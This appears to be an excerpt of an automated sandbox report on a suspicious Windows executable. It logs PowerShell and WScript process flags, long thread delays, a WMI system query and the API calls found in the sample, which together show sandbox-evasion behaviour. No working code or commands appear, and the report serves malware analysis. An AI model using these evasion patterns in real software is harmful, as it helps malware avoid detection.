Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6363	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1640	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7304	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1933	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 364	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7056	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 2616	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4196	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3416	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BCA383 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00BCA383
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BEA02E FindFirstFileExA,	0_2_00BEA02E
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BDB014 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00BDB014

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: 0_2_00BDD3A8 VirtualQuery,GetSystemInfo,

